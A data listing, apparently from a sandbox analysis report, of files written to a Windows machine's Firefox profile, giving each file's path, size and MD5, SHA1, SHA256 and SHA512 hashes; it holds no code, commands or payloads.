SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
1.6MB
MD51dc908064451d5d79018241cea28bc2f
SHA1f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA5126f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin
Filesize17KB
MD5a3529831aa93bcdd0981e3c2623d4f5c
SHA142b76297d15f517deb8fbd46be2445617713e0e3
SHA256441a4578ea5fdfaf06e598ab72a022cdd19617af27cf909c2103f458cbf8c49a
SHA512285fed734775a20f8d30e2968d5eea2b95a9f95355790c20154663bcf5801dd94f506bd2ef7664c749e9598ec710b32cb60ac97edc6e60ff57df50e1e2ad6eca
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin
Filesize10KB
MD57152e7d234e89529e7af5aa6bbb6b1a5
SHA1c14f0b153ca17d503b8514ca2a3b27aa498ed895
SHA256cc9042a942f646a280829151e05a06df2fb2be513445b561911b9393ef50962a
SHA5127bf0153ca7d9fe531c1529fc52791b7fdbac434e76f9c2a5f3204b6bcce80a2451988924751ad62930c7c6bc0367ca114d40532d5414a0939d1ab8b4c2bd353f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin
Filesize12KB
MD50488ea974fef2e1ad67cec53f8d3e385
SHA12a6cfac1696f44e969fda5e8bbefc8c4df88c1eb
SHA25642c78ffcda58be31c83264b88c666ea5879cd19574f5adc244e4aac51f8e36e8
SHA512d396dfba04355b159e5ef240212586a0aa252a17af4d84e30915dfe11329e98fcd93cc892cfad97e1f0e62699506d827262681ef176e09c87ac160a75bcb0695
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD54a9ca8293756de20b11340222799c16a
SHA112ad5f9b3424c52365ba9fe9cc4f48871ba8e870
SHA256583988b4405a7777dff39e9e9b0fbd8f0b95480534c264b95cb75175fece8210
SHA512bf76129ee82dbf06f5a796dadae8cd682c4683018b32e6959fcea181dd66593beffba4e9020456cf4bb2c32171e048a27f78456f62513b2bcded8506654ba3fa
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp
Filesize23KB
MD580fda2ad0159ed5c687b33d4f6dcb98b
SHA1851a27f2f3c16dbb98d90ef6112fc54dd20a4d72
SHA256b691b093becdee4b1be1654357e587426e5178fdad2ab8beba59af9941fa166f
SHA51277f146ec5a9c64f3df556a5f569e807f0247a46c946220e97cc24ba1d0416f146bbc3914c61239f9fcf16930e37ec38808ed060665444e1ac8256c4365b17e71
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp
Filesize32KB
MD5b82cdb452938f946a611dffd7a3e892a
SHA1ccddb86732ad3e90aa76aebf7c105979bd78768e
SHA256db30741e25ba8befb4ba5bf942719bcaa7f8bd8c9074f5fcfda36914ba4ecaad
SHA512f7dc72f8b4942e679c739b7ce27e10fb0dc5eb057bc2e422d0d44a6ad3f371ac0f40749e7907cae990d1774c83835db7e2faa3a25715b8c5ef9ae7e9b5083ca5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\3bcda80a-04a4-4634-be71-351fefc8ccc7
Filesize659B
MD5144072b7692cdeb78e814ef1ce02caf5
SHA13a63605a732bd2562d63f52c100106e1d1fcabba
SHA256572b556eaaa35b379d634eefb715115faa31a3ca1ebc269030983b5ddd7c8f76
SHA512449988386e936eeae03402550bb8a84b791803e8125c6914159ca02113e12080d87b044243432de451f6957c9e8298b88ecdbe2f96a843d2ac5dec15e05f9061
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\e9bbf593-dcab-4730-94b5-7f86eaa5684c
Filesize982B
MD5147c1f34495c6b10880881f8a12c2550
SHA1f825105e3c7946cb205e70602946a33f8515fd96
SHA256c015d1e7f2c4d8fd5cd464723fa149464a1e0a13b2f4d67c6886adebc2f8094c
SHA5124e9c80a39b46e858e80e6a7029bfa221663a199e69f987139079877290c483fa6d1a36183e5eb33985f9e981ccf78d8f7594da8bf8f1293ef94d0aef5c00c5e8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
11KB
MD5835c2498ed247a0b8b911e3fc6dad321
SHA10216fe5a92dc596a5b0509ed70950c63aa09438c
SHA2561c15868bc1261470a70dfdb85453946fb6b3f296ed9ca945d845b0e1ef0fbc22
SHA512898a7ad40d41f63b93b891b3e371cdf9c502c88016dcc793ea7b65d830fcc9ccce9224ac3b42a5d777491eb6240a13c44229971cc91c6a59db710e19d2adc282
-
Filesize
10KB
MD56ced761484aeb71a678427c8e9507a64
SHA131918b3a50f324f41013a05186dbf060abf2ff9f
SHA256e393eddc573dd0a90f612152fc2c1cc38cc25278a5b4d982fd99984c1e3a8458
SHA5127dc62ca6c893a3d88f76cd178e8be7cd5714f1c3b61f440756c115c17531783039176aad5ecc8d681afff1eeb78caf850ba853b0d69105ca3418988f9ce3943b
-
Filesize
9KB
MD5795723d33b01616efbc683a8035e7c5e
SHA13ba2ba20b9dfefae1c37ba887fac8e2399a10dba
SHA2562a218afc147df6e09dcdfe5fa7bd4236303fc2f1aafb955db780cc4ef1b8f956
SHA5128fd70571b8c8775defc0698498fe7c9512c325d2742d3a7e0917f7a72ff5a0dbae50df231ad429f3cdf99b0d86e01d0739eefbbc39968a82915095ba6705633f
-
Filesize
10KB
MD55f9790aaed6eb9ea2874a9c18024f815
SHA1a61e3f01e2dfebe40e8a55275c25adab85dbe0e8
SHA256bbf6177c86ca9d4bd488332c268390642daab2e6368693400b69991b4714e8a3
SHA51283bc5191b040708876a20a0179f049f479d849871a7a825921978bb934319fbaf0256948e693cc3271f0aea08ae9d4f1df1f8adce8f3abb5806de362888a9faf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize9.4MB
MD5a7490f10de3c5d5658c5c2561c9fe063
SHA172b8e1c00f0af930a978f9a4b5b0fa7813f205bb
SHA2561a8ed23beb9ca4822a654ee4ef277cf14934d703ff4fdbabfe0b48764eb8e30d
SHA512baf95cab0adbbc7817d2dcce20218cb88b7521b5c7290c50bb09f61cf89203ead96b29dd55f026988abbd706fcb69269ae80e7b58bd734b83aaf7b0ce4048448
-
Filesize
2KB
MD53526ed8fd00da462e6196db5b12aea69
SHA191a66ccb2bb0782c84aab1531e923453dd73c7de
SHA256ef0a9d1eab62c746c9a2e9c640383689dd68c14289e2bd90e92b4bd7a3ab94f6
SHA51214a0ce63e59c5061779465bb206eb44e0e3819eeb388b22504ee2f259290d6a829b0c44f96363495a645e02d60e0624a6868550f755238a7f02ad6c1770cd6eb